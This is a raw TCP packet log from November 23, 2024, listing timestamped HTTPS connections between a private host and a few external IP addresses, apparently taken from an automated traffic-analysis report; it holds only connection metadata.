                                                                                                                                                                                  Nov 23, 2024 19:53:09.251558065 CET49849443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:09.251573086 CET4434984913.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:09.251636028 CET49849443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:09.252105951 CET49849443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:09.252124071 CET4434984913.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:09.252805948 CET49850443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:09.252842903 CET4434985013.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:09.252904892 CET49850443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:09.253030062 CET49850443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:09.253043890 CET4434985013.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:09.253170967 CET49851443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:09.253185034 CET4434985113.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:09.253242016 CET49851443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:09.253341913 CET49851443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:09.253350973 CET4434985113.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:09.541819096 CET4434984013.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:09.544276953 CET49840443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:09.544287920 CET4434984013.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:09.544630051 CET4434984013.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:09.548021078 CET49840443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:09.548151970 CET4434984013.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:09.548230886 CET49840443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:09.591340065 CET4434984013.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:10.404118061 CET4434984013.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:10.404149055 CET4434984013.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:10.404175043 CET4434984013.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:10.404213905 CET49840443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:10.404227018 CET4434984013.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:10.404256105 CET49840443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:10.404278994 CET49840443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:10.554884911 CET4434984513.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:10.555408001 CET49845443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:10.555424929 CET4434984513.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:10.555900097 CET49845443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:10.555918932 CET4434984513.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:10.560051918 CET4434984413.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:10.560448885 CET49844443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:10.560465097 CET4434984413.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:10.560877085 CET49844443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:10.560880899 CET4434984413.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:10.595860004 CET4434984013.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:10.595885038 CET4434984013.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:10.595959902 CET49840443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:10.595982075 CET4434984013.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:10.595995903 CET49840443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:10.596029997 CET49840443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:10.642016888 CET4434984013.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:10.642036915 CET4434984013.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:10.642152071 CET49840443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:10.642177105 CET4434984013.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:10.642230034 CET49840443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:10.791661024 CET4434984013.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:10.791685104 CET4434984013.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:10.791805983 CET49840443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:10.791831970 CET4434984013.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:10.791887045 CET49840443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:10.832168102 CET4434984013.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:10.832192898 CET4434984013.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:10.832279921 CET49840443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:10.832293987 CET4434984013.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:10.832339048 CET49840443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:10.871340990 CET4434984013.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:10.871362925 CET4434984013.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:10.871454000 CET49840443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:10.871467113 CET4434984013.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:10.871515036 CET49840443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:10.904930115 CET4434984013.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:10.904951096 CET4434984013.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:10.905019045 CET49840443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:10.905035973 CET4434984013.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:10.905067921 CET49840443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:10.905092001 CET49840443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:10.974329948 CET4434984013.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:10.974361897 CET4434984013.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:10.974483967 CET49840443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:10.974515915 CET4434984013.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:10.974564075 CET49840443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:11.002820969 CET4434984013.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:11.002872944 CET4434984013.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:11.003012896 CET49840443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:11.003026009 CET4434984013.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:11.003077030 CET49840443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:11.035530090 CET4434984013.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:11.035557985 CET4434984013.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:11.035686016 CET49840443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:11.035705090 CET4434984013.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:11.035748959 CET49840443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:11.058609962 CET4434984013.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:11.058635950 CET4434984013.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:11.058803082 CET49840443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:11.058809996 CET4434984013.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:11.058855057 CET49840443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:11.070645094 CET4434984013.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:11.070677996 CET4434984013.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:11.070749044 CET49840443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:11.070759058 CET4434984013.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:11.070792913 CET49840443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:11.070811987 CET49840443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:11.081212997 CET4434984013.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:11.081265926 CET4434984013.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:11.081300974 CET4434984013.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:11.081317902 CET49840443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:11.081365108 CET49840443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:11.096169949 CET4434984513.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:11.103665113 CET4434984513.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:11.105762005 CET49845443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:11.106689930 CET4434984413.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:11.111597061 CET4434984413.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:11.111681938 CET4434984413.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:11.111694098 CET49844443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:11.111721992 CET49844443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:11.121318102 CET49840443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:11.121332884 CET4434984013.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:11.124370098 CET49845443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:11.124370098 CET49845443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:11.124397993 CET4434984513.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:11.124413013 CET4434984513.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:11.149940014 CET49857443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:11.149981022 CET4434985713.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:11.150187969 CET49857443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:11.181405067 CET4434985113.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:11.181677103 CET4434985013.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:11.200586081 CET4434984913.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:11.232665062 CET49851443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:11.233652115 CET49850443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:11.257046938 CET49849443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:11.396569967 CET49849443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:11.396590948 CET4434984913.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:11.397021055 CET49849443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:11.397027969 CET4434984913.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:11.397342920 CET49850443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:11.397356033 CET4434985013.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:11.397773981 CET49851443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:11.397788048 CET4434985113.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:11.397805929 CET49850443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:11.397810936 CET4434985013.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:11.398089886 CET49857443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:11.398112059 CET4434985713.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:11.398276091 CET49851443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:11.398287058 CET4434985113.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:11.398643017 CET49844443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:11.398658037 CET4434984413.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:11.425111055 CET44349810172.217.21.36192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:11.425182104 CET44349810172.217.21.36192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:11.425462008 CET49810443192.168.2.7172.217.21.36
                                                                                                                                                                                  Nov 23, 2024 19:53:11.431021929 CET49862443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:11.431056023 CET4434986213.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:11.431310892 CET49862443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:11.432380915 CET49862443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:11.432404041 CET4434986213.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:11.445754051 CET49810443192.168.2.7172.217.21.36
                                                                                                                                                                                  Nov 23, 2024 19:53:11.445772886 CET44349810172.217.21.36192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:11.642277956 CET49865443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:11.642313004 CET4434986513.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:11.642577887 CET49865443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:11.643568039 CET49865443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:11.643577099 CET4434986513.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:11.735053062 CET4434985013.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:11.740998983 CET4434985013.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:11.741060019 CET4434985013.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:11.741061926 CET49850443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:11.741117001 CET49850443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:11.741231918 CET49850443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:11.741245031 CET4434985013.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:11.741255045 CET49850443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:11.741260052 CET4434985013.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:11.747085094 CET4434984913.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:11.749053001 CET49866443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:11.749085903 CET4434986613.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:11.749147892 CET49866443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:11.751440048 CET4434984913.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:11.751492023 CET49849443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:11.760211945 CET49866443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:11.760231018 CET4434986613.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:11.762191057 CET4434985113.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:11.764261961 CET49849443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:11.764276981 CET4434984913.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:11.764288902 CET49849443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:11.764292955 CET4434984913.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:11.766639948 CET4434985113.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:11.766696930 CET49851443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:11.766736031 CET49851443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:11.766741037 CET4434985113.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:11.766758919 CET49851443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:11.766763926 CET4434985113.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:11.768251896 CET49867443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:11.768287897 CET4434986713.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:11.768428087 CET49867443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:11.768672943 CET49867443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:11.768685102 CET4434986713.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:11.769361019 CET49868443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:11.769387960 CET4434986813.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:11.769443035 CET49868443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:11.769556999 CET49868443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:11.769568920 CET4434986813.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:13.167633057 CET4434986213.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:13.168298006 CET49862443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:13.168309927 CET4434986213.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:13.168812037 CET49862443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:13.168817043 CET4434986213.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:13.211692095 CET44349729104.98.116.138192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:13.211823940 CET49729443192.168.2.7104.98.116.138
                                                                                                                                                                                  Nov 23, 2024 19:53:13.234626055 CET49873443192.168.2.74.175.87.197
                                                                                                                                                                                  Nov 23, 2024 19:53:13.234680891 CET443498734.175.87.197192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:13.234766006 CET49873443192.168.2.74.175.87.197
                                                                                                                                                                                  Nov 23, 2024 19:53:13.235115051 CET49873443192.168.2.74.175.87.197
                                                                                                                                                                                  Nov 23, 2024 19:53:13.235136032 CET443498734.175.87.197192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:13.710706949 CET4434985713.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:13.713845015 CET4434986513.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:13.713906050 CET4434986813.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:13.714224100 CET4434986713.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:13.714323997 CET4434986613.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:13.751091957 CET49857443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:13.764197111 CET49865443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:13.765793085 CET49868443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:13.765822887 CET49867443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:13.765829086 CET49866443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:13.792994976 CET49866443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:13.793010950 CET4434986613.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:13.813950062 CET49866443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:13.813958883 CET4434986613.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:13.827614069 CET49867443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:13.827626944 CET4434986713.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:13.831254959 CET49867443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:13.831260920 CET4434986713.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:13.855741978 CET49857443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:13.855760098 CET4434985713.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:13.856062889 CET49857443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:13.856070042 CET4434985713.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:13.872620106 CET49868443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:13.872653008 CET4434986813.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:13.873183966 CET49868443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:13.873189926 CET4434986813.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:13.879829884 CET49865443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:13.879851103 CET4434986513.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:13.881587982 CET4434986513.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:13.881606102 CET4434986513.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:13.881668091 CET49865443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:13.894562006 CET49865443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:13.894598961 CET49865443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:13.894659996 CET4434986513.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:13.936222076 CET49865443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:13.936233044 CET4434986513.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:13.981637955 CET49865443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:14.053987980 CET4434986213.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:14.054060936 CET4434986213.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:14.054116964 CET49862443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:14.056303024 CET49862443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:14.056314945 CET4434986213.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:14.056325912 CET49862443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:14.056330919 CET4434986213.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:14.060401917 CET49878443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:14.060457945 CET4434987813.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:14.060518026 CET49878443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:14.061711073 CET49878443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:14.061726093 CET4434987813.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:14.270286083 CET4434986713.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:14.272784948 CET4434986613.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:14.273834944 CET4434986713.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:14.273888111 CET4434986713.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:14.273917913 CET49867443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:14.273963928 CET49867443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:14.274065018 CET49867443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:14.274079084 CET4434986713.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:14.274092913 CET49867443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:14.274100065 CET4434986713.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:14.276072979 CET4434986613.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:14.277015924 CET49883443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:14.277044058 CET49866443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:14.277064085 CET4434988313.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:14.277105093 CET49866443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:14.277120113 CET4434986613.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:14.277139902 CET49883443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:14.278135061 CET49883443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:14.278158903 CET4434988313.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:14.279381990 CET49884443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:14.279396057 CET4434988413.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:14.279490948 CET49884443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:14.279617071 CET49884443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:14.279632092 CET4434988413.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:14.287252903 CET4434986813.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:14.288765907 CET4434985713.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:14.290240049 CET4434986813.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:14.290302038 CET49868443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:14.290388107 CET49868443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:14.290395975 CET4434986813.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:14.291852951 CET4434985713.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:14.291915894 CET49857443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:14.292221069 CET49857443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:14.292232037 CET4434985713.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:14.292244911 CET49857443192.168.2.713.107.246.63
